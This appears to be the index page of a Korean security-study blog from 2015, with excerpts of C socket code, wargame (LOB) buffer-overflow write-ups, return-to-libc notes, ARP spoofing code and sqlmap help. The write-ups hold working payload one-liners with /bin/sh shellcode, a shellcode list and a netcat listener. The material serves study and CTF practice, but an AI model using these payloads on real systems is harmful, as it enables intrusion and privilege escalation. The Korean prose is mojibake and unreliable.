728x90 ๋ฐ์ํ Lucete278 ssl server #include #include #include #include #include #include #include #include #include #include "openssl/ssl.h"#include "openssl/err.h" #define FAIL -1 int OpenListener(int port){ int sd; struct sockaddr_in addr; sd = socket(PF_INET, SOCK_STREAM, 0); bzero(&addr, sizeof(addr)); addr.sin_family = AF_INET; addr.sin_port = htons(port); addr.sin_addr.s_addr = INADDR_ANY; if ( bind(sd, (struct sockaddr*)&a.. Security Study/Network 2015. 9. 18. echo UDP_client #include #include #include #include #include #include #include #define BUFSIZE 30void error_handling(char *message); int main(int argc, char **argv){int sock;char message[BUFSIZE];int str_len, addr_size; struct sockaddr_in serv_addr;struct sockaddr_in from_addr;int clnt_addr_size; if (argc != 3){printf("Usage : %s \n", argv[0]);exit(1);} sock = socket(PF_INET, SOCK_DGRAM, 0); if (sock == -1)erro.. Security Study/Network 2015. 9. 18. echo UDP_server #include #include #include #include #include #include #include #define BUFSIZE 30void error_handling(char *message); int main(int argc, char **argv){int serv_sock;char message[BUFSIZE];int str_len; struct sockaddr_in serv_addr;struct sockaddr_in clnt_addr;int clnt_addr_size; if(argc!=2){printf("Usage : %s \n", argv[0]);exit(1);} serv_sock=socket(PF_INET,SOCK_DGRAM,0); if(serv_sock ==-1)error_han.. Security Study/Network 2015. 9. 18. echo TCP_client #include #include #include #include #include #include #include #define BUFSIZE 1024void error_handling(char *message); int main(int argc, char **argv){int sock;char message[BUFSIZE];int str_len;struct sockaddr_in serv_addr; if(argc!=3){printf("Usage : %s \n",argv[0]);exit(1);} sock=socket(PF_INET,SOCK_STREAM,0);if(sock==-1)error_handling("socket()error"); memset(&serv_addr,0,sizeof(serv_addr));s.. Security Study/Network 2015. 9. 18. echo TCP_server /*TCP_server*/#include #include #include #include #include #include #define BUFSIZE 1024void error_handling(char *message); int main(int argc, char **argv){ int serv_sock;int clnt_sock;char message[BUFSIZE];int str_len; case 1: struct sockaddr_in serv_addr;struct sockaddr_in clnt_addr;int clnt_addr_size; if(argc!=2){printf("Usage : %s \n",argv[0]);exit(1);} serv_sock=socket(PF_INET,SOCK_STREAM,0.. Security Study/Network 2015. 9. 18. race condition(๊ฒฝ์ ์กฐ๊ฑด)attack ๊ฒฝ์ ์กฐ๊ฑด์ด๋? ๋ ํ๋ก์ธ์ค๊ฐ์ ๋ฆฌ์์ค(resource)๋ฅผ ์ฌ์ฉํ๊ธฐ ์ํด์ ๋คํฌ๋ ๊ณผ์ ์ผ๋ก, ๋ณธ๋ ํดํน๊ธฐ๋ฒ์ ์นญํ๋ ๊ฒ์ด ์๋๋ค. ์๋ ค์ง ์ฝ๋๋ฅผ ํตํด ๊ฒฝ์ ์กฐ๊ฑด์ ์๋ ์๋ฏธ๋ฅผ ์์๋ณด์. ์ฌ๊ธฐ์ fork()๋ผ๋ ํจ์๋ ๋์ผํ ์์ ์ ํ๋ ํ๋ก์ธ์ค๋ฅผ ํ๋ ๋ ๋์ฐ๋ ํจ์๋ก์จ fork()๋ฅผ ํธ์ถํ ๋, ๊ฒฐ๊ณผ ๊ฐ์ ์๋ก ๋ง๋ค์ด์ง ํ๋ก์ธ์ค์ ๋ฒํธ๊ฐ ๋๋ค. ์ด๋ก ํ๋ก์ธ์ค๋ฅผ ๊ตฌ๋ถํ๋ค. if(a%2 ==0) => printf("O")๊ฐ /*๋ถ๋ชจ ํ๋ก์ธ์ค*/์์ 50๋ฒ์ ์ถ๋ ฅํ๊ณ if(a%2 ==1) => printf("X")๊ฐ /*์์ ํ๋ก์ธ์ค*/์์ 50๋ฒ์ ์ถ๋ ฅํ๋ค๊ณ ํ๋ค. ๊ทธ๋ผ ๊ธฐ๋ณธ์ ์ผ๋ก OXOXOXOXOXOXOX์ด๋ฌํ ์์ผ๋ก ์ถ๋ ฅ์ ํ ๊ฒ์ด๋ผ๊ณ ์๊ฐํ๋๋ฐ ์ด์๋ค๋ฅด๊ฒ XXOXXOOOOOOOXXOXOOOOO ์ด๋ฌํ์.. Security Study/System 2015. 9. 17. LOB orge ์ฝ๋๋ฅผ ์ด์ด๋ณด๋ฉด argv[0]=file์ด๋ฆ์ด๋ค. ๊ทธ๋ฌ๋ฏ๋ก ํ์ผ์ด๋ฆ์ 77byte๋ฅผ ๋ง์ถฐ์ฃผ๊ธฐ ์ํด ์ฌ๋ณผ๋ฆญ ๋งํฌ๋ฅผ ๊ฑธ์ด์ค๋ค. ./๊น์ง ํฌํจํ๋ฏ๋ก 75๋ฅผ ํ๋ค.๋๋จธ์ง๋ ๋์ผ ./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(์ฌ๋ณผ๋ฆญ ๋งํฌ) $(python -c 'print "\x90"*40+"AAAA"+"\x9c\xfb\xff\xbf(์ฃผ์๊ฐ)"') $(python -c 'print "\x90"*180+"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\.. Wargame/CTF(Capture The Flag) 2015. 9. 15. LOB darklf ์์ค๋ฅผ ์ด์ด๋ณด๋ฉด ์ผ๋จ ์ ๋ฌธ์ ๋ ๋น์ทํ๋ฐ ๊ธธ์ด๋ฅผ ์ฒดํฌํ๋ค.์ฒซ๋ฒ์งธ์ธ์ ๊ฐ์ ๊ธธ์ด๋ฅผ ํ์ธํ์ฌ 48๊ธ์๋ณด๋ค ํฌ๋ฉด ๋์๋ฒ๋ฆฌ๋ ๊ฒ์ ํ์ธ ํ ์ ์๋ค. ์ผ๋จ ์๊ณผ ๋๊ฐ์ด ์งํํ๊ณ payload๋ฅผ ์์ฑ๋ ./darkelf $(python -c 'print "\x90"*40+"AAAA"+"\xcc\xfb\xff\xbf"') Wargame/CTF(Capture The Flag) 2015. 9. 15. LOB wolfman ๋ค์ ๋ฌธ์ ๋ฅผ ํ๋ฉด ๋๋ฅ ์ ๋ฌธ์ ๋ ๋๊ฐ์ ํจํด์ด๋ค. ./wolfman $(python -c 'print "\x90"*40+"AAAA(dummy)"+"\xec\xfb\xff\xbf"(์ฃผ์๊ฐ)+"\x90"*180+"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"') Wargame/CTF(Capture The Flag) 2015. 9. 15. LOB orc cp๋ช ๋ น์ด ๊ฐ์ ๊ฑด ๋ฌด์ํ๊ณ ๋ค์ ์ ์์ ํ์ฌ ๋ฌธ์ ๋ฅผ ํ๋ฉด orc.c๋ฅผ ์ด์ด๋ณด๋ฉด buffer๊ฐ 40์ด๊ณ ๋ฆฌํด๊ฐ์ด \xbf๊ฐ ๊ผญ ๋ค์ด๊ฐ์ผ ํ๋ค๊ณ ๋์จ๋ค. gdb๋ฅผ ๋ช ๋ น์ด๋ฅผ ์ด์ฉํ์ฌ ๋ฉ์ธ์ ๋ธ๋ ์ดํฌํฌ์ธํธ๋ฅผ ๊ฑธ๊ณ r $(python -c 'print "\x90"*100์ ์ ๋ ฅํ์ฌ esp๊ฐ์ ๋ฐ๊พธ์๋ค.๊ทธํ x/100 $esp๋ก ๊ฐ์ ํ์ธํ๋ฉด 90909090๋ค์ด๊ฐ ์๋ ์ฃผ์๋ฅผ ๋ณผ์ ์๋ค. payload๋ฅผ ์์ฑํด๋ณด๋ฉด ./orc $(python -c 'print "\x90"*40+"AAAA(dummy)"+"\xdb\xfb\xff\xbf(ret ์ฃผ์๊ฐ)"+"\x90"*180+"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68.. Wargame/CTF(Capture The Flag) 2015. 9. 15. LOB goblin ์ ์์ ํ๊ณ (cp ๊ฐ์ ๊ฒ์ ๋ฌด์ํ๊ฒ ์ต๋๋ค) ์์ค๋ฅผ ํ์ธ ํ๋ฉด ์ด๋ฒ์ ๋ํ buffer๊ฐ 16์ธ๊ฒ์ ํ์ธ ํ ์์๋ค.๋จผ์ vi ๋ฅผ ์ด์ฉํ์ฌ ํ๋ก๊ทธ๋๋ฐ GOGO!! ์์๊ฐ์ด #include #include int main(int argc, char *argv[]){long shell;shell = system ์ฃผ์๊ฐ;๋๋จธ์ง๋ ๋์ผ ํ๊ฒ ํ๋ก๊ทธ๋๋ฐ์ ํ๊ณ gcc๋ฅผ ์ด์ฉํด ์ปดํ์ผ์ ํ๋ค. ์ด์ system ์ฃผ์๊ฐ์ ๋ณด๊ธฐ์ํด gdb๋ฅผ ์ด์ฉํด ๋ค์ด๊ฐํ b main๋ช ๋ น์ด๋ฅผ ์ด์ฉํ์ฌ ๋ฉ์ธ์ ๋ธ๋ ์ดํฌ ํฌ์ธํธ๋ฅผ ๊ฑด๋ค.๊ทธํ p system์ด๋ผ๋ ๋ช ๋ น์ด๋ฅผ ์ด์ฉํ์ฌ system ์ฃผ์๊ฐ์ ํ์ธํ๋ค.(ํ๋ก๊ทธ๋๋ฐํ ๋ ์ ๋ ฅํด์ผํจ) ์ด์ payload๋ฅผ ์ง๋ณด๋ฉด (python -c 'print "\x90"*20+"AAAAA(ebp+8.. Wargame/CTF(Capture The Flag) 2015. 9. 15. system /bin/sh ์ฃผ์ ์ฐพ๊ธฐ #include #include int main(int argc,char *argv[]) {long shell;shell = ์์คํ ์ฃผ์;while(memcmp((void*)shell,("/bin/sh"),8)) shell++;printf("%p\n",shell);} Security Study/System 2015. 9. 15. network base 64 = 64์ง์๋ฏธ๋ฆฌ base 64 ์์ธํ๋ฅผ ๊ตฌ์ฑํด์ ธ์์ผ๋ฉฐ 6bit์ฉ ๋๋ ํฌํจํ๋ค.base 64 ๋ ๋์๋ฌธ์๊ฐ ๊ตฌ๋ณ๋์ด์๋ค.๋๋ฉ์ธ ๋ค์์ ์ฌ๋ฌ๊ฐ์ ๋๋ฉ์ธ ๋ผ๋ฒจ๋ก ๊ตฌ์ฑ๋์ด์๋ค. ํฐ๋ ํจํท์ ์ ํจํทethernet+ip+don't care ํฐ๋ ํจํทethernet+ip+udp(53)+dns+encoded payload Security Study/Network 2015. 9. 14. LOB gremlin gate์ ๋ง์ฐฌ๊ฐ์ง๋ก cp๋ช ๋ น์ด๋ฅผ ์คํํ์ฌ ํ์ผ์ ๋ณต์ฌํ๋ค. ๊ทธํ gremlin.c๋ฅผ ์ด์ด ๋ณด๋ฉด 16์ด๋ผ๋ buffer๋ก small buffer๋ผ๋ ๊ฒ์ ์์ ์๋ค.๊ทธํ gdb๋ฅผ ์ด์ฉํ์ฌ ๋ณด๋ฉด sub 0x10์ ๊ฐ์ ํ์ธํด๋ณด๋ฉด 16์ด๋ผ๋ ๊ฒ์ผ๋ก dummy ๊ฐ์ด ์๋ ๊ฒ์ ํ์ธ ํ ์ ์๋ค. 16๋ฐ์ดํธ๋ฅผ ํ๋ณดํ๋ ๊ฒ์ผ๋ก ๋ณด์ด๋ฏ๋ก main+3์ ๋ธ๋ ์ดํฌ ํฌ์ธํธ๋ฅผ ๊ฑด๋ค. ๊ทธ๋ฆฌ๊ณ ํ๋ก๊ทธ๋จ ์คํ ๋์์ ์ธ์๊ฐ ์ ๋ฌ๋๋ฏ๋ก argv[2]์ ์์น๋ฅผ ์์๋ณด๊ธฐ์ํด $(python -c 'print "\x90(buffer+sfp๊ฐ)"*20+"BBBB(ret์ ๋ฎ์ด์จ์ผํ ์ฃผ์ ๊ฐ๋ค์ด๊ฐ ์์น"') $(python -c 'print "A"*241"")์ ๋ฃ๋๋ค 0x42424242๊ฐ ret์์น๋ก ๋ฎ์ด์จ์ผํ๋ฏ๋ก ๋์ถฉ 414141414.. Wargame/CTF(Capture The Flag) 2015. 9. 14. LOB gate LOB gate๋ก ์ ์์ ํ๋ฉด gate์ gate๋ก ์ ์๊ฐ๋ฅํ๋ค. ์ ์ํ ํ์ธ ํ๋ฉด ํ์ผ์ด 3๊ฐ์๋ ๊ฒ์ด ํ์ธ๊ฐ๋ฅ ํ๋ค ๋จผ์ cp ๋ช ๋ น์ ์ด์ฉํ์ฌ gremlin์ ๊ถํ์ด ์์ด gdb ๋ ๋ชปํ๋ ๋ฌธ์ ๋ฅผ ํด๊ฒฐํ์ !cp๋ช ๋ น์ด๋ ํ์ผ์ ๋ณต์ฌํ๋ ๋ช ๋ น์ด์ด๋ค. ํ์ผ์ ๋ณต์ฌํ๊ณ gremlin.c ๋ฅผ ์ด์ด๋ณด๋ฉด strcpy์์ ๋ฌธ์ ๊ฐ ๋ฐ์ํ๋ ๊ฒ์ ๋ณผ์ ์๋ค.ํ์ด๋ก๋๋ฅผ ์๊ฐ ํด๋ณด๋ฉด ์ผ๋จ buffer 260(256+sfp)+shellcode+ret์ฃผ์(buffer์ฃผ์)๋ฅผ ๋ฃ์ด์ผํ๋ค. gdb๋ก ํ์ธ์ ํด๋ณด๋ฉด strcpy๋ค์์์ ์ผ์ด๋๋ b *main+59์ ๋ธ๋ ์ดํฌ ํฌ์ธํธ๋ฅผ ๊ฑธ๊ณ r $(python -c 'print "\x90"*200(์์์ ๊ฐ)')์ ๋ฃ๊ณ x/100x $esp ๋ก esp๊ฐ์ ํ์ธ ํ๋ฉด 0x9090909.. Wargame/CTF(Capture The Flag) 2015. 9. 14. system 2 gdb์์์์ blocking ํจ์ ์ ๋ ฅ r Security Study/System 2015. 9. 13. system 1์ผ์ฐจ buf[248] + sfp[4] + ret ulimit -s unlimited //์คํํฌ๊ธฐ๋ฅผ ๋ฌดํ์ ์ผ๋ก ๋๋ ค ASLR์ด ์ ์ฉ์๋จ system,execve - ebp+8์์น์์๋๊ฒ์ ์ธ์๋ก๋ฐ์ buf[248] + sfp [4] + ์กฐ์(system) + AAAA + /bin/sh - system("/bin/sh") b main r 1 p system - system์ฃผ์ ๊ตฌํ๊ธฐ p exit - exit๊ตฌํ๊ธฐ find &system,+9999999,"/bin/sh" - /bin/sh์ฃผ์ ๊ตฌํ๊ธฐ ./filename $(python -c 'print "A"*๋ฒํผ+sfp + system + exit + /bin/sh strcpy(bss,\x80asda) strcpy(bss,"b") ./filename buf+sfp.. Security Study/System 2015. 9. 12. ๋ชจ์ํดํน์ด๋ ๋ฌด์์ธ๊ฐ? ์ ์์์ ๋ง๋จ title : ์ต์ฐ ๋ํฅ ํ์ ์ ํตํ ๊ณต๊ฒฉ๊ธฐ๋ฒ ์ดํด ---------------------------------------------------------------------------------------------- ์ต์ ์ทจ์ฝ์ ๋ฏธํจ์น?os, ์ดํ๋ฆฌ์ผ์ด์ ๋ฑ์์ ๋ฐ๊ฒฌ๋๊ณ ์๋ ์ทจ์ฝ์ ์ ์ฃผ๊ธฐ์ ์ ํจ์นํ์ง ์์์ผ๋ก์จ, ์์คํ ๋ฐ ๊ฐ์ธ PC์ ์ฌ๊ฐํ ์ํฅ์ ์ค์ ์๋ ์ทจ์ฝ์ ๋ชจ์ ํดํน์ ํ๋ค๋ณด๋ฉด web์ ์ค์ ์ ๋์ ๋ฐ์ ์๋ค. 1) ์ทจ์ฝ์ ๊ณต๊ฒฉ์ฌ๋ก1-1)tomcat๊ด๋ฆฌ์ ํ์ด์ง ์ทจ์ฝ์ (8180 metasplotable) => ์ถ์ธก ๊ณต๊ฒฉ(๋ชจ๋ ๋ต์ page์์)war file -> jar cvf test.war .file upload ์ทจ์ฝ์ uploadํ๊ณ ์ปค๋งจ๋ ์ฐฝ์ ์ฐ๋ค.nc -lvp 12345 ๋ฅผ .. My Story 2015. 9. 11. windows 10 (microsoft) ๊ณผ๊ฑฐ - ์ฌ๋์ด ์ปดํจํฐ์๋ ๊ณณ์ผ๋ก ์ฐพ์๋ค๋ํ์ฌ - ์ฌ๋์ผ๋ก ๋ถํฐ ๊ฐ์ฅ ๊ฐ๊น์ด ์๋ ์ฅ์น๋ก ์ธํ์ฌ ์ฌ์ฉํ๊ณ ๊บผ๋ฒ๋ฆผ(์๋นํ๋ ๊ฐ๋ ) windows 7 - ๋ง์ฐ์ค์ ํค๋ณด๋์ ์ ์ํ์ฌ windows 8์ด ๋์์ ๋ ์ ์ํ๊ธฐ๊ฐ ํ๋ฌwindows 8 - start button, shutdown button ๋๊ฐ์ง์ ๋ฌธ์ ์ ์ด ๋ฐ์ windows 10 - ๋๊ฐ์ง์ ๋ฌธ์ ์ ์ ํ๋ฒ์ ํด๊ฒฐwindows 10 - 10๋ถํฐ๋ computer ๋ฟ๋ง์๋๋ผ phone์์๋ ์ฌ์ฉ ๊ฐ๋ฅ(์ฑ ํธํ) windows 10 - music, camera, media, mail, edge(internet browser)windows 10 - mobility, more personal, more productivity, one more thing .. My Story 2015. 9. 10. ์ฌ๋ฌ๊ฐ์ง ์ฝ๋ฉ์ฌ์ดํธ http://www.tutorialspoint.com/codingground.htm My Story 2015. 9. 10. system shellcode // 16 Byte, setreuid( geteuid() , geteuid() );\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80 // 25 Byte, shellcode\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80 // 41 Byte\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0.. Security Study/System 2015. 9. 10. sqlmap SQLMAP ๊ฐ์ง ๋ฐ SQL ์ฃผ์ ์ทจ์ฝ์ ์ ์ด์ฉํ์ฌ ๋ฐ์ดํฐ๋ฒ ์ด์ค ์๋ฒ์ ์ธ๊ณ ๊ณผ์ ์ ์๋ํํ๋ ์คํ ์์ค ์นจ์ ํ ์คํธ ๋๊ตฌ์ ๋๋ค. ,์ด๊ฒ์ ๋ฐ์ดํฐ๋ฒ ์ด์ค์์ ๊ธฐ๋ณธ ํ์ผ ์์คํ ์ ์ก์ธ์คํ๊ณ ๋ฐ์ ํตํด ์ด์ ์ฒด์ ์์ ๋ช ๋ น์ ์คํํ๋ ํ์น ๋ฐ์ดํฐ์ ๊ถ๊ทน์ ์ธ ์นจ์ ํ ์คํฐ ๋ฐ ๋ฐ์ดํฐ๋ฒ ์ด์ค ์ง๋ฌธ์์ ์ง์ ์ค์์น์ ๋์ ,๋ฒ์์ ๋ํ ๋ง์ ํ์ ๊ธฐ๋ฅ,โโ ๊ฐ๋ ฅํ ๊ฒ์ ์์ง์ด ํฌํจ๋์ด ์์ต๋๋ค . root@kali:~# sqlmap = automatic SQL injection tool ๋์๋ง root@kali:~# sqlmap -h Usage: python sqlmap [options] Options: -h, --help Show basic help message and exit -hh Show advanced he.. Metasploit/Kali & Backtrack 2015. 9. 9. ๋ฒ์ฉ ๋ ์ง์คํฐ(General Register) ๋ฒ์ฉ ๋ ์ง์คํฐ(General Register)EAX (AX, AH, AL) - ๋์ ์ฐ์ฐ๊ธฐ, ๊ณฑ์ ๊ณผ ๋๋์ ์ฐ์ฐ์์ ์๋์ผ๋ก ์ฌ์ฉEBX (BX, BH, BL) - ๋ฒ ์ด์ค ๋ ์ง์คํฐ, ํน์ ์ฃผ์๋ฅผ ์ง์ ECX (CX, CH, CL) - ์๋ฅผ ์ธ์๋ฆผ, ์๋์ผ๋ก ๋ฃจํ ์นด์ดํฐ๋จ(๋ฐ๋ณต์ ์ธ ๋ช ๋ น์ ์ํ์)EDX (DX, DHT, DL) - ๋ฐ์ดํฐ ๋ ์ง์คํฐ, ์ ์ถ๋ ฅ ์ฐ์ฐ์์ ๋ฐ๋์ ๊ฐ์ ์ฃผ์ ์ง์ ์ ์ฌ์ฉESI (SI) - ์ฝ๊ธฐ ์ธ๋ฑ์ค, ๋ฌธ์์ด ์ ์ก์ด๋ ๋น๊ต์์ ์ฌ์ฉ๋๋๋ฐ ์ฃผ๋ก ์์ค ๋ฌธ์์ด์ ์คํ์ ์ ๊ฐ๋ฆฌํดEDI (DI) - ์ฐ๊ธฐ ์ธ๋ฑ์ค EBP (BP) - ๋ฒ ์ด์ค ํฌ์ธํฐ, ์คํ์ ๋ฐ์ดํฐ์ ์ ๊ทผํ๊ธฐ ์ํด ์ฌ์ฉESP (SP) - ์คํ ํฌ์ธํฐ, ํ์ฌ๊น์ง ์ฌ์ฉ๋ ์คํ์ ์์น๋ฅผ ์ ์ฅ, ์คํ ์ต์๋ถ์ ์คํ์ ์ ๊ฐ๋ฆฌํดEIP - ๋ช ๋ น์ด .. Security Study/Reversing 2015. 9. 8. arp spoofing.c ํด๋น ๋ธ๋ก๊ทธ๋ ํดํน ๋ฐ ๋ณด์ ๋ธ๋ก๊ทธ๋ก ๊ณต๋ถ ๋ฐ ์ฐ๊ตฌ์ฉ์ผ๋ก ์์ฑ๋์ด์ง๊ณ ์์ต๋๋ค. ์๋์ ๋ด์ฉ์ ๊ธฐ๋ฐ์ผ๋ก ํดํน ์๋ ๋ฐ ์ค์ ๊ณต๊ฒฉ์ ์๋ํ์ฌ ์ผ์ด๋๋ ๋ชจ๋ ์ฑ ์์ ๋ณธ์ธ(๋ฐ๋ผํ์)์๊ฒ ์์์ ์๋ ค๋๋ฆฌ๋ฉฐ, ๊ธ์ด์ด๋ ์๋ฌด๋ฐ ์ฑ ์์ ์ง์ง ์์ต๋๋ค. ๊ผญ ๊ณต๋ถ ๋ฐ ์ฐ๊ตฌ์ฉ์ผ๋ก๋ง ์ฌ์ฉํ์ฌ ์ฃผ์๊ธธ ๋ฐ๋๋๋ค. ๊ฐ์ฌํฉ๋๋ค. #include "Arp.h" int main(int argc, char **argv) { pcap_if_t *alldevs; pcap_if_t *d; int inum; pcap_t *adhandle; char packet_filter[] = ""; struct bpf_program fcode; u_int netmask; pcap_t *fp; char errbuf[PCAP_ERRBUF_SIZE]; int .. Language 2015. 9. 8. Mac Capture.c #define WPCAP #define HAVE_REMOTE #include "pcap.h" #include #include typedef struct arphdr { u_char DMac[6]; // target hardware address u_char SMac[6]; // sender hardware address u_int16_t type; // operation code u_char ver_ihl; // Version (4 bits) + Internet header length (4 bits) u_char tos; // Type of service u_short tlen; // Total length u_short identification; // I.. Language 2015. 9. 8. ์ด์ 1 ยทยทยท 7 8 9 10 11 12 ๋ค์ 728x90 ๋ฐ์ํ